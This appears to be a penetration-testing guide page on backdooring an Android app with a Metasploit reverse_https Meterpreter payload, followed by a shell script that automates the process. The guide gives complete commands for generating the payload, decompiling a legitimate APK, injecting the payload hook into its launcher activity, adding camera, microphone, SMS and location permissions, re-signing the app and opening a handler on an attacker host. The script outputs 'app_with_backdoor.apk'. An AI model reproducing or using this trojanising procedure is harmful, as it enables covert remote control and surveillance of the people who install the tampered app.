4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)
Create Payload
msfvenom -p android/meterpreter/reverse_https LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o meterpreter.apk
Tampering
Decompile meterpreter.apk & original app_name.apk
apktool d -f -o ./payload_apk /path/to/your/meterpreter.apk
apktool d -f -o ./original_apk /path/to/your/app_name.apk
Add the stage package directory to the original project (the path must match the package the Payload class lives in, com.metasploit.stage, otherwise the invoke-static below will not resolve):
mkdir -p ./original_apk/smali/com/metasploit/stage
Copy payload files (everything in the stage package, not just Payload.smali):
cp ./payload_apk/smali/com/metasploit/stage/* ./original_apk/smali/com/metasploit/stage/
Get MainActivity name: in ./original_apk/AndroidManifest.xml it is the <activity> whose <intent-filter> contains the android.intent.action.MAIN action and the android.intent.category.LAUNCHER category (aapt dump badging app_name.apk also prints it as launchable-activity). Its smali file is named after the class, e.g. ./original_apk/smali/<package path>/MainActivity.smali; in multidex apps it may sit under smali_classes2/ or later instead.
Modify MainActivity.smali
Search for:
;->onCreate(Landroid/os/Bundle;)V
This matches the invoke-super call at the top of the activity's own onCreate method. Add a new line directly after it and paste (p0 is the Activity itself, which is a Context, so no extra register is needed and .locals stays unchanged):
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Add every <uses-permission> that ./payload_apk/AndroidManifest.xml declares and the original ./original_apk/AndroidManifest.xml lacks, placing them before <application> (INTERNET is required for the reverse connection; camera, microphone, location and SMS permissions are what the corresponding Meterpreter commands rely on). If the payload manifest also declares <service> or <receiver> elements for the com.metasploit.stage classes you copied, copy those into the original's <application> element as well.
Recompile:
apktool b ./original_apk
Sign apk (key creation + zipalign + signing). Align before signing: apksigner's v2+ signature covers the whole file, so running zipalign afterwards invalidates it.
keytool -genkey -v -keystore my-release-key.keystore -alias myalias -keyalg RSA -keysize 2048 -validity 10000
/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/zipalign -p 4 ./original_apk/dist/app_name.apk /path/to/app_with_backdoor.apk
/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/apksigner sign --ks my-release-key.keystore --ks-key-alias myalias /path/to/app_with_backdoor.apk
/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/apksigner verify /path/to/app_with_backdoor.apk
Install modified apk (it is signed with your key, not the vendor's, so it will not install over an existing copy of the real app; uninstall that first):
adb install /path/to/app_with_backdoor.apk
Start meterpreter session handler (use the same IP & port as when generating the payload; LHOST must be an address the device can actually reach, e.g. 10.0.2.2 is the host as seen from an Android emulator):
msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run
Start the application on the device: the hook fires in onCreate and a Meterpreter session should open in the handler. Have fun! ;)
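The whole tampering procedure above, scripted as an added example (not code from the original page, nor from Metasploit or apktool). It assumes apktool, zipalign, apksigner and keytool are on PATH, the directory names used above (./payload_apk, ./original_apk), an existing my-release-key.keystore with alias myalias, and a launcher activity declared as a plain <activity> (activity-alias is not handled). The functions cover the manual steps that are easiest to get wrong, finding the launcher activity in any apktool output (multidex included), inserting the hook exactly once directly after the onCreate invoke-super, and merging permissions without duplicates; the build pipeline at the bottom runs only when the script is invoked with the build argument.

```shell
#!/usr/bin/env bash
# Added example (not from the original page). Assumptions: apktool, zipalign, apksigner
# and keytool on PATH; apktool output dirs ./payload_apk and ./original_apk as in the
# walkthrough; my-release-key.keystore with alias myalias already created (see keytool above).

PAYLOAD_DIR=${PAYLOAD_DIR:-./payload_apk}
ORIG_DIR=${ORIG_DIR:-./original_apk}
STAGE_REL=smali/com/metasploit/stage
# Line injected after the invoke-super in onCreate; p0 is the Activity, i.e. a Context.
HOOK='    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V'

# Print the launcher activity (MAIN action + LAUNCHER category) from an apktool-decoded manifest.
launcher_activity() {   # $1 = AndroidManifest.xml
    awk '
        /<activity[ >]/ { inact=1; name=""; main=0; launch=0; infilter=0 }
        inact && !infilter && name=="" && match($0, "android:name=\"[^\"]*\"") {
            name=substr($0, RSTART+14, RLENGTH-15)   # strip android:name=" and the closing quote
        }
        /<intent-filter/    { infilter=1 }
        /<\/intent-filter>/ { infilter=0 }
        /android\.intent\.action\.MAIN/       { main=1 }
        /android\.intent\.category\.LAUNCHER/ { launch=1 }
        /<\/activity>/ { if (inact && main && launch && name!="") { print name; exit }; inact=0 }
    ' "$1"
}

# Locate the .smali for a class, checking smali/, smali_classes2/, ... (multidex apps).
activity_smali() {   # $1 = fully qualified class name, e.g. com.example.app.MainActivity
    rel=$(printf '%s' "$1" | tr . /).smali
    find "$ORIG_DIR" -path "$ORIG_DIR/smali*/$rel" -print | head -n 1
}

# Insert the Payload.start hook once, directly after the invoke-super ...->onCreate(...) line.
patch_oncreate() {   # $1 = the activity's .smali (edited in place); idempotent
    grep -qF 'Lcom/metasploit/stage/Payload;->start' "$1" && return 0
    awk -v hook="$HOOK" '
        { print }
        !hit && /;->onCreate\(Landroid\/os\/Bundle;\)V/ { print hook; hit=1 }
        END { exit hit ? 0 : 1 }
    ' "$1" > "$1.tmp" && mv "$1.tmp" "$1" || { rm -f "$1.tmp"; echo "no onCreate call in $1" >&2; return 1; }
}

# Copy every <uses-permission> the payload manifest has and the original lacks, inserted
# before <application> (where uses-permission elements belong).
merge_permissions() {   # $1 = payload AndroidManifest.xml, $2 = original AndroidManifest.xml (edited in place)
    grep -o '<uses-permission [^>]*/>' "$1" | sort -u | while IFS= read -r perm; do
        name=$(printf '%s\n' "$perm" | sed -n 's/.*android:name="\([^"]*\)".*/\1/p')
        [ -n "$name" ] || continue
        grep -qF "android:name=\"$name\"" "$2" && continue
        awk -v line="    $perm" '!hit && /<application/ { print line; hit=1 } { print }' "$2" > "$2.tmp" \
            && mv "$2.tmp" "$2"
    done
}

# Whole pipeline; runs only when invoked as:  ./backdoor.sh build app_name.apk meterpreter.apk
if [ "${1:-}" = "build" ]; then
    set -e
    apktool d -f -o "$PAYLOAD_DIR" "$3"
    apktool d -f -o "$ORIG_DIR" "$2"
    mkdir -p "$ORIG_DIR/$STAGE_REL"
    cp "$PAYLOAD_DIR/$STAGE_REL"/* "$ORIG_DIR/$STAGE_REL"/
    act=$(launcher_activity "$ORIG_DIR/AndroidManifest.xml")
    [ -n "$act" ] || { echo "no launcher activity found" >&2; exit 1; }
    patch_oncreate "$(activity_smali "$act")"
    merge_permissions "$PAYLOAD_DIR/AndroidManifest.xml" "$ORIG_DIR/AndroidManifest.xml"
    apktool b "$ORIG_DIR" -o unsigned.apk
    zipalign -p 4 unsigned.apk aligned.apk   # align BEFORE apksigner: the v2+ signature covers the whole file
    apksigner sign --ks my-release-key.keystore --ks-key-alias myalias --out app_with_backdoor.apk aligned.apk
    echo "hooked $act -> app_with_backdoor.apk"
fi
```

Invoke it as ./backdoor.sh build app_name.apk meterpreter.apk. The helper functions can also be sourced and run one at a time against an existing apktool tree when only one step (say, the smali patch) needs redoing; patch_oncreate refuses to insert the hook twice, so re-running it is safe.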